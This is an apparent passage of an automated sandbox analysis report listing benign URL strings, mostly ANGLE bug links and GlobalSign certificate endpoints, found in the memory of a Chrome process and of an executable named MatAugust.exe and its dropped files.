Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/55355
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/67556
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063858031.0000250C00724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000011.00000002.2063858031.0000250C00724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036ty
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370?
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000011.00000002.2061689597.0000250C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000011.00000002.2063461166.0000250C0060C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: MatAugust.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Stopped.com.1.dr, Convinced.8.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: MatAugust.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Stopped.com.1.dr, Convinced.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: MatAugust.exe	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: chrome.exe, 00000011.00000002.2060714046.0000250C0008E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000011.00000003.1987903426.0000250C00FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987712081.0000250C00EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988291160.0000250C0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1987978177.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: MatAugust.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: MatAugust.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: MatAugust.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: MatAugust.exe	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: MatAugust.exe	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Stopped.com.1.dr, Convinced.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Stopped.com.1.dr, Passenger.8.dr, Convinced.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: MatAugust.exe, Stopped.com.1.dr, Passenger.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
